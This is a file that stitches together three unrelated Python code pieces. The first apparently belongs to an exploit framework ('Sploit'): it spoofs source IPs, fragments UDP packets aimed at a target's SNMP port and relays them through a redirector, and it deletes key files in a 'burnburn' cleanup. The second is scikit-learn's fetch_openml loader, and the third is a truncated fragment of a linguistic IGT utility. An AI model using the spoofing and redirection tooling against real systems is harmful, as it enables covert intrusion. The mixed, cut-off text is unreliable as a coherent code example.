@overridable("Overrides don't need to call base implementation")
def run(self, exp):
'''
'''
if not exp.params.burnburn:
keys = '%s/%s.key' % (exp.get_key_dir(), exp.params.key)
else:
keys = '%s/*.key' % exp.get_key_dir()
l = glob.glob(keys)
for f in l:
print '[+] deleting %s' % f
os.unlink(f)
class PseudoSocket(object):
def __init__(self, target_ip, target_port):
self.target_ip = target_ip
self.target_port = target_port
self.timeout = 30
self.verbose = 1
self.sock = None
self.log = None
def create(self):
try:
msg = "getaddrinfo returns an empty list"
for res in socket.getaddrinfo(self.target_ip, self.target_port, 0, socket.SOCK_DGRAM):
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
sock.settimeout(self.timeout)
sock.connect(sa)
except socket.error, msg:
if sock:
sock.close()
sock = None
continue
break
if not sock:
raise socket.error, msg
except socket.error:
raise RuntimeError,'[+] Cannot connect to %s:%d\n[+] port might not be up' % (self.target_ip, self.target_port)
return sock
def send(self, packet):
if not self.sock:
self.sock = self.create()
self.sock.sendall(str(packet))
def receive(self, bytes):
if not self.sock:
self.sock = self.create()
return self.sock.recv(bytes)
def close(self):
if self.sock:
self.sock.close()
self.sock = None
@property
def expecting_response(self):
return True
@property
def destination_ip(self):
return self.target_ip
def establish_tcp_connection(self, port):
ret = False
try:
sock = socket.socket()
sock.settimeout(self.timeout)
sock.connect((self.destination_ip, port))
sock.sendall('\n')
response = sock.recv(10)
ret = True
except socket.error:
pass
finally:
if sock:
sock.close()
return ret
class FragmentingPseudoSocket(PseudoSocket):
def __init__(self, target_ip, target_port, outbound_ip, outbound_port, return_ip, return_port, listen_port):
super(FragmentingPseudoSocket, self).__init__(target_ip, target_port)
self.outbound_ip = outbound_ip
self.outbound_port = outbound_port
self.return_ip = return_ip
self.return_port = return_port or random.randint(2048,65500)
self.listen_port = listen_port
self.fragment_size = Sploit.DEFAULT_FRAGMENT_SIZE
self.raw_send = False
def create(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
sock.settimeout(self.timeout)
sock.connect((self.outbound_ip, self.outbound_port))
return sock
def send(self, packet):
original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
if self.verbose > 1:
print "Original packet:"
original_packet.show()
hexdump(str(original_packet))
fragments = fragment(original_packet, fragsize = self.fragment_size)
try:
i = 1
for frag in fragments:
if self.verbose > 1:
print "Fragment %d of %d:" % (i, len(fragments))
frag.show()
frag = str(frag)
length = struct.pack(">I", len(frag))
if not self.sock:
print '[+] connecting ...'
self.sock = self.create()
print '[+] sending part %d of %d now..' % (i, len(fragments))
hexdump(frag)
if self.log:
self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
self.sock.send(length)
self.sock.send(frag)
if self.log:
self.log('sent fragment %d of %d' % (i, len(fragments)))
i += 1
if self.raw_send:
if self.log:
self.log('forcing a new connection due to raw_send flag')
self.close()
except KeyboardInterrupt,e:
print "[-] keyboard interrupt while connecting/sending to redirector"
raise KeyboardInterrupt,e
except socket.timeout,e:
print "[-] timeout while connecting/sending to redirector"
raise socket.timeout,e
finally:
self.close()
def receive(self, bytes):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(self.timeout)
sock.bind(("", self.listen_port))
response = sock.recv(bytes)
sock.close()
return response
except:
if sock:
sock.close()
raise
@property
def expecting_response(self):
return True if self.listen_port else False
@property
def destination_ip(self):
return self.outbound_ip
def _parse_ip(ip):
'''
'''
try:
x = socket.inet_aton(ip)
return socket.inet_ntoa(x)
except:
Sploit.parse_error("'%s' is an invalid IP address" % ip)
def _parse_port(port):
'''
'''
try:
return int(port)
except:
Sploit.parse_error("'%s' is an invalid port" % port)
def _parse_target(text):
'''
'''
parts = text.split( ':' )
if len(parts) == 2:
return {'ip': _parse_ip(parts[0]), 'port': _parse_port(parts[1])}
else:
return {'ip': _parse_ip(text), 'port': 161}
def _parse_redirect(text, expect_response):
'''
'''
parts = text.split(':')
if expect_response and len(parts) != 5:
Sploit.parse_error('the --redirect option requires 5 fields as follows outbound_tunnel_local_ip:outbound_tunnel_local_port:return_tunnel_remote_ip:return_tunnel_remote_port:listen_port')
if not expect_response and not (3 <= len(parts) <= 4):
Sploit.parse_error('the --spoof option requires 3 or 4 fields as follows redir_ip:redir_port:spoofed_ip[:spoofed_srcport]')
redir = {}
redir['outbound_ip'] = _parse_ip(parts[0])
redir['outbound_port'] = _parse_port(parts[1])
redir['return_ip'] = _parse_ip(parts[2])
redir['return_port'] = _parse_port(parts[3]) if (len(parts) > 3) else None
redir['listen_port'] = _parse_port(parts[4]) if (len(parts) > 4) else None
return redir
if __name__ == '__main__':
import unittest
import sploit_test
runner = unittest.TextTestRunner()
runner.run(sploit_test.suite)
|
|
import gzip
import json
import os
import shutil
import hashlib
from os.path import join
from warnings import warn
from contextlib import closing
from functools import wraps
from typing import Callable, Optional, Dict, Tuple, List, Any, Union
import itertools
from collections.abc import Generator
from collections import OrderedDict
from functools import partial
from urllib.request import urlopen, Request
import numpy as np
import scipy.sparse
from ..externals import _arff
from ..externals._arff import ArffSparseDataType, ArffContainerType
from . import get_data_home
from urllib.error import HTTPError
from ..utils import Bunch
from ..utils import is_scalar_nan
from ..utils import get_chunk_n_rows
from ..utils import _chunk_generator
from ..utils import check_pandas_support # noqa
__all__ = ["fetch_openml"]
_OPENML_PREFIX = "https://openml.org/"
_SEARCH_NAME = "api/v1/json/data/list/data_name/{}/limit/2"
_DATA_INFO = "api/v1/json/data/{}"
_DATA_FEATURES = "api/v1/json/data/features/{}"
_DATA_QUALITIES = "api/v1/json/data/qualities/{}"
_DATA_FILE = "data/v1/download/{}"
OpenmlQualitiesType = List[Dict[str, str]]
OpenmlFeaturesType = List[Dict[str, str]]
def _get_local_path(openml_path: str, data_home: str) -> str:
return os.path.join(data_home, "openml.org", openml_path + ".gz")
def _retry_with_clean_cache(openml_path: str, data_home: Optional[str]) -> Callable:
"""If the first call to the decorated function fails, the local cached
file is removed, and the function is called again. If ``data_home`` is
``None``, then the function is called once.
"""
def decorator(f):
@wraps(f)
def wrapper(*args, **kw):
if data_home is None:
return f(*args, **kw)
try:
return f(*args, **kw)
except HTTPError:
raise
except Exception:
warn("Invalid cache, redownloading file", RuntimeWarning)
local_path = _get_local_path(openml_path, data_home)
if os.path.exists(local_path):
os.unlink(local_path)
return f(*args, **kw)
return wrapper
return decorator
def _open_openml_url(openml_path: str, data_home: Optional[str]):
"""
Returns a resource from OpenML.org. Caches it to data_home if required.
Parameters
----------
openml_path : str
OpenML URL that will be accessed. This will be prefixes with
_OPENML_PREFIX
data_home : str
Directory to which the files will be cached. If None, no caching will
be applied.
Returns
-------
result : stream
A stream to the OpenML resource
"""
def is_gzip_encoded(_fsrc):
return _fsrc.info().get("Content-Encoding", "") == "gzip"
req = Request(_OPENML_PREFIX + openml_path)
req.add_header("Accept-encoding", "gzip")
if data_home is None:
fsrc = urlopen(req)
if is_gzip_encoded(fsrc):
return gzip.GzipFile(fileobj=fsrc, mode="rb")
return fsrc
local_path = _get_local_path(openml_path, data_home)
if not os.path.exists(local_path):
try:
os.makedirs(os.path.dirname(local_path))
except OSError:
# potentially, the directory has been created already
pass
try:
with closing(urlopen(req)) as fsrc:
opener: Callable
if is_gzip_encoded(fsrc):
opener = open
else:
opener = gzip.GzipFile
with opener(local_path, "wb") as fdst:
shutil.copyfileobj(fsrc, fdst)
except Exception:
if os.path.exists(local_path):
os.unlink(local_path)
raise
# XXX: First time, decompression will not be necessary (by using fsrc), but
# it will happen nonetheless
return gzip.GzipFile(local_path, "rb")
class OpenMLError(ValueError):
"""HTTP 412 is a specific OpenML error code, indicating a generic error"""
pass
def _get_json_content_from_openml_api(
url: str, error_message: Optional[str], data_home: Optional[str]
) -> Dict:
"""
Loads json data from the openml api
Parameters
----------
url : str
The URL to load from. Should be an official OpenML endpoint
error_message : str or None
The error message to raise if an acceptable OpenML error is thrown
(acceptable error is, e.g., data id not found. Other errors, like 404's
will throw the native error message)
data_home : str or None
Location to cache the response. None if no cache is required.
Returns
-------
json_data : json
the json result from the OpenML server if the call was successful.
An exception otherwise.
"""
@_retry_with_clean_cache(url, data_home)
def _load_json():
with closing(_open_openml_url(url, data_home)) as response:
return json.loads(response.read().decode("utf-8"))
try:
return _load_json()
except HTTPError as error:
# 412 is an OpenML specific error code, indicating a generic error
# (e.g., data not found)
if error.code != 412:
raise error
# 412 error, not in except for nicer traceback
raise OpenMLError(error_message)
def _split_sparse_columns(
arff_data: ArffSparseDataType, include_columns: List
) -> ArffSparseDataType:
"""
obtains several columns from sparse arff representation. Additionally, the
column indices are re-labelled, given the columns that are not included.
(e.g., when including [1, 2, 3], the columns will be relabelled to
[0, 1, 2])
Parameters
----------
arff_data : tuple
A tuple of three lists of equal size; first list indicating the value,
second the x coordinate and the third the y coordinate.
include_columns : list
A list of columns to include.
Returns
-------
arff_data_new : tuple
Subset of arff data with only the include columns indicated by the
include_columns argument.
"""
arff_data_new: ArffSparseDataType = (list(), list(), list())
reindexed_columns = {
column_idx: array_idx for array_idx, column_idx in enumerate(include_columns)
}
for val, row_idx, col_idx in zip(arff_data[0], arff_data[1], arff_data[2]):
if col_idx in include_columns:
arff_data_new[0].append(val)
arff_data_new[1].append(row_idx)
arff_data_new[2].append(reindexed_columns[col_idx])
return arff_data_new
def _sparse_data_to_array(
arff_data: ArffSparseDataType, include_columns: List
) -> np.ndarray:
# turns the sparse data back into an array (can't use toarray() function,
# as this does only work on numeric data)
num_obs = max(arff_data[1]) + 1
y_shape = (num_obs, len(include_columns))
reindexed_columns = {
column_idx: array_idx for array_idx, column_idx in enumerate(include_columns)
}
# TODO: improve for efficiency
y = np.empty(y_shape, dtype=np.float64)
for val, row_idx, col_idx in zip(arff_data[0], arff_data[1], arff_data[2]):
if col_idx in include_columns:
y[row_idx, reindexed_columns[col_idx]] = val
return y
def _convert_arff_data(
arff: ArffContainerType,
col_slice_x: List[int],
col_slice_y: List[int],
shape: Optional[Tuple] = None,
) -> Tuple:
"""
converts the arff object into the appropriate matrix type (np.array or
scipy.sparse.csr_matrix) based on the 'data part' (i.e., in the
liac-arff dict, the object from the 'data' key)
Parameters
----------
arff : dict
As obtained from liac-arff object.
col_slice_x : list
The column indices that are sliced from the original array to return
as X data
col_slice_y : list
The column indices that are sliced from the original array to return
as y data
Returns
-------
X : np.array or scipy.sparse.csr_matrix
y : np.array
"""
arff_data = arff["data"]
if isinstance(arff_data, Generator):
if shape is None:
raise ValueError("shape must be provided when arr['data'] is a Generator")
if shape[0] == -1:
count = -1
else:
count = shape[0] * shape[1]
data = np.fromiter(
itertools.chain.from_iterable(arff_data), dtype="float64", count=count
)
data = data.reshape(*shape)
X = data[:, col_slice_x]
y = data[:, col_slice_y]
return X, y
elif isinstance(arff_data, tuple):
arff_data_X = _split_sparse_columns(arff_data, col_slice_x)
num_obs = max(arff_data[1]) + 1
X_shape = (num_obs, len(col_slice_x))
X = scipy.sparse.coo_matrix(
(arff_data_X[0], (arff_data_X[1], arff_data_X[2])),
shape=X_shape,
dtype=np.float64,
)
X = X.tocsr()
y = _sparse_data_to_array(arff_data, col_slice_y)
return X, y
else:
# This should never happen
raise ValueError("Unexpected Data Type obtained from arff.")
def _feature_to_dtype(feature: Dict[str, str]):
"""Map feature to dtype for pandas DataFrame"""
if feature["data_type"] == "string":
return object
elif feature["data_type"] == "nominal":
return "category"
# only numeric, integer, real are left
elif feature["number_of_missing_values"] != "0" or feature["data_type"] in [
"numeric",
"real",
]:
# cast to floats when there are any missing values
return np.float64
elif feature["data_type"] == "integer":
return np.int64
raise ValueError("Unsupported feature: {}".format(feature))
def _convert_arff_data_dataframe(
arff: ArffContainerType, columns: List, features_dict: Dict[str, Any]
) -> Tuple:
"""Convert the ARFF object into a pandas DataFrame.
Parameters
----------
arff : dict
As obtained from liac-arff object.
columns : list
Columns from dataframe to return.
features_dict : dict
Maps feature name to feature info from openml.
Returns
-------
result : tuple
tuple with the resulting dataframe
"""
pd = check_pandas_support("fetch_openml with as_frame=True")
attributes = OrderedDict(arff["attributes"])
arff_columns = list(attributes)
if not isinstance(arff["data"], Generator):
raise ValueError(
"arff['data'] must be a generator when converting to pd.DataFrame."
)
# calculate chunksize
first_row = next(arff["data"])
first_df = pd.DataFrame([first_row], columns=arff_columns)
row_bytes = first_df.memory_usage(deep=True).sum()
chunksize = get_chunk_n_rows(row_bytes)
# read arff data with chunks
columns_to_keep = [col for col in arff_columns if col in columns]
dfs = []
dfs.append(first_df[columns_to_keep])
for data in _chunk_generator(arff["data"], chunksize):
dfs.append(pd.DataFrame(data, columns=arff_columns)[columns_to_keep])
df = pd.concat(dfs, ignore_index=True)
for column in columns_to_keep:
dtype = _feature_to_dtype(features_dict[column])
if dtype == "category":
cats_without_missing = [
cat
for cat in attributes[column]
if cat is not None and not is_scalar_nan(cat)
]
dtype = pd.api.types.CategoricalDtype(cats_without_missing)
df[column] = df[column].astype(dtype, copy=False)
return (df,)
def _get_data_info_by_name(
name: str, version: Union[int, str], data_home: Optional[str]
):
"""
Utilizes the openml dataset listing api to find a dataset by
name/version
OpenML api function:
https://www.openml.org/api_docs#!/data/get_data_list_data_name_data_name
Parameters
----------
name : str
name of the dataset
version : int or str
If version is an integer, the exact name/version will be obtained from
OpenML. If version is a string (value: "active") it will take the first
version from OpenML that is annotated as active. Any other string
values except "active" are treated as integer.
data_home : str or None
Location to cache the response. None if no cache is required.
Returns
-------
first_dataset : json
json representation of the first dataset object that adhired to the
search criteria
"""
if version == "active":
# situation in which we return the oldest active version
url = _SEARCH_NAME.format(name) + "/status/active/"
error_msg = "No active dataset {} found.".format(name)
json_data = _get_json_content_from_openml_api(
url, error_msg, data_home=data_home
)
res = json_data["data"]["dataset"]
if len(res) > 1:
warn(
"Multiple active versions of the dataset matching the name"
" {name} exist. Versions may be fundamentally different, "
"returning version"
" {version}.".format(name=name, version=res[0]["version"])
)
return res[0]
# an integer version has been provided
url = (_SEARCH_NAME + "/data_version/{}").format(name, version)
try:
json_data = _get_json_content_from_openml_api(
url, error_message=None, data_home=data_home
)
except OpenMLError:
# we can do this in 1 function call if OpenML does not require the
# specification of the dataset status (i.e., return datasets with a
# given name / version regardless of active, deactivated, etc. )
# TODO: feature request OpenML.
url += "/status/deactivated"
error_msg = "Dataset {} with version {} not found.".format(name, version)
json_data = _get_json_content_from_openml_api(
url, error_msg, data_home=data_home
)
return json_data["data"]["dataset"][0]
def _get_data_description_by_id(
data_id: int, data_home: Optional[str]
) -> Dict[str, Any]:
# OpenML API function: https://www.openml.org/api_docs#!/data/get_data_id
url = _DATA_INFO.format(data_id)
error_message = "Dataset with data_id {} not found.".format(data_id)
json_data = _get_json_content_from_openml_api(
url, error_message, data_home=data_home
)
return json_data["data_set_description"]
def _get_data_features(data_id: int, data_home: Optional[str]) -> OpenmlFeaturesType:
# OpenML function:
# https://www.openml.org/api_docs#!/data/get_data_features_id
url = _DATA_FEATURES.format(data_id)
error_message = "Dataset with data_id {} not found.".format(data_id)
json_data = _get_json_content_from_openml_api(
url, error_message, data_home=data_home
)
return json_data["data_features"]["feature"]
def _get_data_qualities(data_id: int, data_home: Optional[str]) -> OpenmlQualitiesType:
# OpenML API function:
# https://www.openml.org/api_docs#!/data/get_data_qualities_id
url = _DATA_QUALITIES.format(data_id)
error_message = "Dataset with data_id {} not found.".format(data_id)
json_data = _get_json_content_from_openml_api(
url, error_message, data_home=data_home
)
# the qualities might not be available, but we still try to process
# the data
return json_data.get("data_qualities", {}).get("quality", [])
def _get_num_samples(data_qualities: OpenmlQualitiesType) -> int:
"""Get the number of samples from data qualities.
Parameters
----------
data_qualities : list of dict
Used to retrieve the number of instances (samples) in the dataset.
Returns
-------
n_samples : int
The number of samples in the dataset or -1 if data qualities are
unavailable.
"""
# If the data qualities are unavailable, we return -1
default_n_samples = -1
qualities = {d["name"]: d["value"] for d in data_qualities}
return int(float(qualities.get("NumberOfInstances", default_n_samples)))
def _load_arff_response(
url: str,
data_home: Optional[str],
return_type,
encode_nominal: bool,
parse_arff: Callable[[ArffContainerType], Tuple],
md5_checksum: str,
) -> Tuple:
"""Load arff data with url and parses arff response with parse_arff"""
response = _open_openml_url(url, data_home)
with closing(response):
# Note that if the data is dense, no reading is done until the data
# generator is iterated.
actual_md5_checksum = hashlib.md5()
def _stream_checksum_generator(response):
for line in response:
actual_md5_checksum.update(line)
yield line.decode("utf-8")
stream = _stream_checksum_generator(response)
arff = _arff.load(
stream, return_type=return_type, encode_nominal=encode_nominal
)
parsed_arff = parse_arff(arff)
# consume remaining stream, if early exited
for _ in stream:
pass
if actual_md5_checksum.hexdigest() != md5_checksum:
raise ValueError(
"md5 checksum of local file for "
+ url
+ " does not match description. "
"Downloaded file could have been modified / "
"corrupted, clean cache and retry..."
)
return parsed_arff
def _download_data_to_bunch(
url: str,
sparse: bool,
data_home: Optional[str],
*,
as_frame: bool,
features_list: List,
data_columns: List[int],
target_columns: List,
shape: Optional[Tuple[int, int]],
md5_checksum: str,
):
"""Download OpenML ARFF and convert to Bunch of data"""
# NB: this function is long in order to handle retry for any failure
# during the streaming parse of the ARFF.
# Prepare which columns and data types should be returned for the X and y
features_dict = {feature["name"]: feature for feature in features_list}
# XXX: col_slice_y should be all nominal or all numeric
_verify_target_data_type(features_dict, target_columns)
col_slice_y = [int(features_dict[col_name]["index"]) for col_name in target_columns]
col_slice_x = [int(features_dict[col_name]["index"]) for col_name in data_columns]
for col_idx in col_slice_y:
feat = features_list[col_idx]
nr_missing = int(feat["number_of_missing_values"])
if nr_missing > 0:
raise ValueError(
"Target column {} has {} missing values. "
"Missing values are not supported for target "
"columns. ".format(feat["name"], nr_missing)
)
# Access an ARFF file on the OpenML server. Documentation:
# https://www.openml.org/api_data_docs#!/data/get_download_id
if sparse is True:
return_type = _arff.COO
else:
return_type = _arff.DENSE_GEN
frame = nominal_attributes = None
parse_arff: Callable
postprocess: Callable
if as_frame:
columns = data_columns + target_columns
parse_arff = partial(
_convert_arff_data_dataframe, columns=columns, features_dict=features_dict
)
def postprocess(frame):
X = frame[data_columns]
if len(target_columns) >= 2:
y = frame[target_columns]
elif len(target_columns) == 1:
y = frame[target_columns[0]]
else:
y = None
return X, y, frame, nominal_attributes
else:
def parse_arff(arff):
X, y = _convert_arff_data(arff, col_slice_x, col_slice_y, shape)
# nominal attributes is a dict mapping from the attribute name to
# the possible values. Includes also the target column (which will
# be popped off below, before it will be packed in the Bunch
# object)
nominal_attributes = {
k: v
for k, v in arff["attributes"]
if isinstance(v, list) and k in data_columns + target_columns
}
return X, y, nominal_attributes
def postprocess(X, y, nominal_attributes):
is_classification = {
col_name in nominal_attributes for col_name in target_columns
}
if not is_classification:
# No target
pass
elif all(is_classification):
y = np.hstack(
[
np.take(
np.asarray(nominal_attributes.pop(col_name), dtype="O"),
y[:, i : i + 1].astype(int, copy=False),
)
for i, col_name in enumerate(target_columns)
]
)
elif any(is_classification):
raise ValueError(
"Mix of nominal and non-nominal targets is not currently supported"
)
# reshape y back to 1-D array, if there is only 1 target column;
# back to None if there are not target columns
if y.shape[1] == 1:
y = y.reshape((-1,))
elif y.shape[1] == 0:
y = None
return X, y, frame, nominal_attributes
out = _retry_with_clean_cache(url, data_home)(_load_arff_response)(
url,
data_home,
return_type=return_type,
encode_nominal=not as_frame,
parse_arff=parse_arff,
md5_checksum=md5_checksum,
)
X, y, frame, nominal_attributes = postprocess(*out)
return Bunch(
data=X,
target=y,
frame=frame,
categories=nominal_attributes,
feature_names=data_columns,
target_names=target_columns,
)
def _verify_target_data_type(features_dict, target_columns):
# verifies the data type of the y array in case there are multiple targets
# (throws an error if these targets do not comply with sklearn support)
if not isinstance(target_columns, list):
raise ValueError("target_column should be list, got: %s" % type(target_columns))
found_types = set()
for target_column in target_columns:
if target_column not in features_dict:
raise KeyError("Could not find target_column={}")
if features_dict[target_column]["data_type"] == "numeric":
found_types.add(np.float64)
else:
found_types.add(object)
# note: we compare to a string, not boolean
if features_dict[target_column]["is_ignore"] == "true":
warn("target_column={} has flag is_ignore.".format(target_column))
if features_dict[target_column]["is_row_identifier"] == "true":
warn("target_column={} has flag is_row_identifier.".format(target_column))
if len(found_types) > 1:
raise ValueError(
"Can only handle homogeneous multi-target datasets, "
"i.e., all targets are either numeric or "
"categorical."
)
def _valid_data_column_names(features_list, target_columns):
# logic for determining on which columns can be learned. Note that from the
# OpenML guide follows that columns that have the `is_row_identifier` or
# `is_ignore` flag, these can not be learned on. Also target columns are
# excluded.
valid_data_column_names = []
for feature in features_list:
if (
feature["name"] not in target_columns
and feature["is_ignore"] != "true"
and feature["is_row_identifier"] != "true"
):
valid_data_column_names.append(feature["name"])
return valid_data_column_names
def fetch_openml(
name: Optional[str] = None,
*,
version: Union[str, int] = "active",
data_id: Optional[int] = None,
data_home: Optional[str] = None,
target_column: Optional[Union[str, List]] = "default-target",
cache: bool = True,
return_X_y: bool = False,
as_frame: Union[str, bool] = "auto",
):
"""Fetch dataset from openml by name or dataset id.
Datasets are uniquely identified by either an integer ID or by a
combination of name and version (i.e. there might be multiple
versions of the 'iris' dataset). Please give either name or data_id
(not both). In case a name is given, a version can also be
provided.
Read more in the :ref:`User Guide <openml>`.
.. versionadded:: 0.20
.. note:: EXPERIMENTAL
The API is experimental (particularly the return value structure),
and might have small backward-incompatible changes without notice
or warning in future releases.
Parameters
----------
name : str, default=None
String identifier of the dataset. Note that OpenML can have multiple
datasets with the same name.
version : int or 'active', default='active'
Version of the dataset. Can only be provided if also ``name`` is given.
If 'active' the oldest version that's still active is used. Since
there may be more than one active version of a dataset, and those
versions may fundamentally be different from one another, setting an
exact version is highly recommended.
data_id : int, default=None
OpenML ID of the dataset. The most specific way of retrieving a
dataset. If data_id is not given, name (and potential version) are
used to obtain a dataset.
data_home : str, default=None
Specify another download and cache folder for the data sets. By default
all scikit-learn data is stored in '~/scikit_learn_data' subfolders.
target_column : str, list or None, default='default-target'
Specify the column name in the data to use as target. If
'default-target', the standard target column a stored on the server
is used. If ``None``, all columns are returned as data and the
target is ``None``. If list (of strings), all columns with these names
are returned as multi-target (Note: not all scikit-learn classifiers
can handle all types of multi-output combinations)
cache : bool, default=True
Whether to cache downloaded datasets using joblib.
return_X_y : bool, default=False
If True, returns ``(data, target)`` instead of a Bunch object. See
below for more information about the `data` and `target` objects.
as_frame : bool or 'auto', default='auto'
If True, the data is a pandas DataFrame including columns with
appropriate dtypes (numeric, string or categorical). The target is
a pandas DataFrame or Series depending on the number of target_columns.
The Bunch will contain a ``frame`` attribute with the target and the
data. If ``return_X_y`` is True, then ``(data, target)`` will be pandas
DataFrames or Series as describe above.
If as_frame is 'auto', the data and target will be converted to
DataFrame or Series as if as_frame is set to True, unless the dataset
is stored in sparse format.
.. versionchanged:: 0.24
The default value of `as_frame` changed from `False` to `'auto'`
in 0.24.
Returns
-------
data : :class:`~sklearn.utils.Bunch`
Dictionary-like object, with the following attributes.
data : np.array, scipy.sparse.csr_matrix of floats, or pandas DataFrame
The feature matrix. Categorical features are encoded as ordinals.
target : np.array, pandas Series or DataFrame
The regression target or classification labels, if applicable.
Dtype is float if numeric, and object if categorical. If
``as_frame`` is True, ``target`` is a pandas object.
DESCR : str
The full description of the dataset
feature_names : list
The names of the dataset columns
target_names: list
The names of the target columns
.. versionadded:: 0.22
categories : dict or None
Maps each categorical feature name to a list of values, such
that the value encoded as i is ith in the list. If ``as_frame``
is True, this is None.
details : dict
More metadata from OpenML
frame : pandas DataFrame
Only present when `as_frame=True`. DataFrame with ``data`` and
``target``.
(data, target) : tuple if ``return_X_y`` is True
.. note:: EXPERIMENTAL
This interface is **experimental** and subsequent releases may
change attributes without notice (although there should only be
minor changes to ``data`` and ``target``).
Missing values in the 'data' are represented as NaN's. Missing values
in 'target' are represented as NaN's (numerical target) or None
(categorical target)
"""
if cache is False:
# no caching will be applied
data_home = None
else:
data_home = get_data_home(data_home=data_home)
data_home = join(data_home, "openml")
# check valid function arguments. data_id XOR (name, version) should be
# provided
if name is not None:
# OpenML is case-insensitive, but the caching mechanism is not
# convert all data names (str) to lower case
name = name.lower()
if data_id is not None:
raise ValueError(
"Dataset data_id={} and name={} passed, but you can only "
"specify a numeric data_id or a name, not "
"both.".format(data_id, name)
)
data_info = _get_data_info_by_name(name, version, data_home)
data_id = data_info["did"]
elif data_id is not None:
# from the previous if statement, it is given that name is None
if version != "active":
raise ValueError(
"Dataset data_id={} and version={} passed, but you can only "
"specify a numeric data_id or a version, not "
"both.".format(data_id, version)
)
else:
raise ValueError(
"Neither name nor data_id are provided. Please provide name or data_id."
)
data_description = _get_data_description_by_id(data_id, data_home)
if data_description["status"] != "active":
warn(
"Version {} of dataset {} is inactive, meaning that issues have "
"been found in the dataset. Try using a newer version from "
"this URL: {}".format(
data_description["version"],
data_description["name"],
data_description["url"],
)
)
if "error" in data_description:
warn(
"OpenML registered a problem with the dataset. It might be "
"unusable. Error: {}".format(data_description["error"])
)
if "warning" in data_description:
warn(
"OpenML raised a warning on the dataset. It might be "
"unusable. Warning: {}".format(data_description["warning"])
)
return_sparse = False
if data_description["format"].lower() == "sparse_arff":
return_sparse = True
if as_frame == "auto":
as_frame = not return_sparse
if as_frame and return_sparse:
raise ValueError("Cannot return dataframe with sparse data")
# download data features, meta-info about column types
features_list = _get_data_features(data_id, data_home)
if not as_frame:
for feature in features_list:
if "true" in (feature["is_ignore"], feature["is_row_identifier"]):
continue
if feature["data_type"] == "string":
raise ValueError(
"STRING attributes are not supported for "
"array representation. Try as_frame=True"
)
if target_column == "default-target":
# determines the default target based on the data feature results
# (which is currently more reliable than the data description;
# see issue: https://github.com/openml/OpenML/issues/768)
target_columns = [
feature["name"]
for feature in features_list
if feature["is_target"] == "true"
]
elif isinstance(target_column, str):
# for code-simplicity, make target_column by default a list
target_columns = [target_column]
elif target_column is None:
target_columns = []
elif isinstance(target_column, list):
target_columns = target_column
else:
raise TypeError(
"Did not recognize type of target_column"
"Should be str, list or None. Got: "
"{}".format(type(target_column))
)
data_columns = _valid_data_column_names(features_list, target_columns)
shape: Optional[Tuple[int, int]]
# determine arff encoding to return
if not return_sparse:
# The shape must include the ignored features to keep the right indexes
# during the arff data conversion.
data_qualities = _get_data_qualities(data_id, data_home)
shape = _get_num_samples(data_qualities), len(features_list)
else:
shape = None
# obtain the data
url = _DATA_FILE.format(data_description["file_id"])
bunch = _download_data_to_bunch(
url,
return_sparse,
data_home,
as_frame=bool(as_frame),
features_list=features_list,
shape=shape,
target_columns=target_columns,
data_columns=data_columns,
md5_checksum=data_description["md5_checksum"],
)
if return_X_y:
return bunch.data, bunch.target
description = "{}\n\nDownloaded from openml.org.".format(
data_description.pop("description")
)
bunch.update(
DESCR=description,
details=data_description,
url="https://www.openml.org/d/{}".format(data_id),
)
return bunch
|
|
import logging
from intent.igt.consts import ODIN_JUDGMENT_ATTRIBUTE
from intent.igt.igtutils import rgencode, get_judgment, extract_judgment
from unittest import TestCase
from intent.igt.igtutils import strip_leading_whitespace
from intent.igt.search import normalized_tier, cleaned_tier
from intent.utils.dicts import DefaultOrderedDict
import xigt.xigtpath as xp
from xigt.consts import ALIGNMENT
CREATE_LOG = logging.getLogger("IGT_CREATION")
# -------------------------------------------
# Add
# -------------------------------------------
def create_text_tier_from_lines(inst, lines, id_base, state):
"""
Given a list of lines that are dicts with the attributes 'text' and 'tag', create
a text tier of the specified type with the provided line items.
:type lines: list[dict]
"""
# -------------------------------------------
# 1) Generate the parent tier.
tier = RGTier(id=gen_tier_id(inst, id_base), type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:state})
# -------------------------------------------
# 2) Iterate over the list of lines
for line in lines:
# Make sure the line is a dict.
if not hasattr(line, 'get') or 'text' not in line or 'tag' not in line:
raise RGXigtException("When constructing tier from lines, must be a list of dicts with keys 'text' and 'tag'.")
# Construct the list of tags.
alltags = []
if line.get('tag') is not None:
alltags.append(line.get('tag'))
if line.get('labels') is not None and line.get('labels'):
alltags.append(line.get('labels'))
tag_str = '+'.join(alltags)
# Construct the attributes
line_attributes = {ODIN_TAG_ATTRIBUTE:tag_str}
if line.get('judgment') is not None:
line_attributes[ODIN_JUDGMENT_ATTRIBUTE] = line['judgment']
l = RGItem(id=gen_item_id(tier.id, len(tier)),
attributes=line_attributes,
text=line.get('text'))
tier.append(l)
return tier
def add_text_tier_from_lines(inst, lines, id_base, state):
tier = create_text_tier_from_lines(inst, lines, id_base, state)
inst.append(tier)
# -------------------------------------------
#
# -------------------------------------------
def add_normal_line_to_tier(inst, tier, tag, func):
clean_tier = get_clean_tier(inst)
clean_lines = [l for l in clean_tier if tag in l.attributes[ODIN_TAG_ATTRIBUTE].split('+')]
if len(clean_lines) > 1:
PARSELOG.warning(rgencode(clean_tier))
raise XigtFormatException("Clean tier should not have multiple lines of same tag.")
# If there are clean lines for this tag... There must be only 1...
# create it and add it to the tier.
elif clean_lines:
attributes = {ODIN_TAG_ATTRIBUTE:clean_lines[0].attributes[ODIN_TAG_ATTRIBUTE]}
cl = clean_lines[0]
text = None if cl.value() is None else func(cl.value())
text, j = (None, None) if text is None else extract_judgment(text)
# -------------------------------------------
# Several options for the judgment attribute...
# -------------------------------------------
# 1) It was previously there on the clean tier.
# in this case, carry it over to the normalized
# tier.
line_judgment = cl.attributes.get(ODIN_JUDGMENT_ATTRIBUTE)
if line_judgment is not None:
attributes[ODIN_JUDGMENT_ATTRIBUTE] = line_judgment
# -------------------------------------------
# 2) After being cleaned, there is still a judgment
# character on the line. Extract it and add
# the appropriate attribute.
elif text is not None and j is not None:
attributes[ODIN_JUDGMENT_ATTRIBUTE] = j
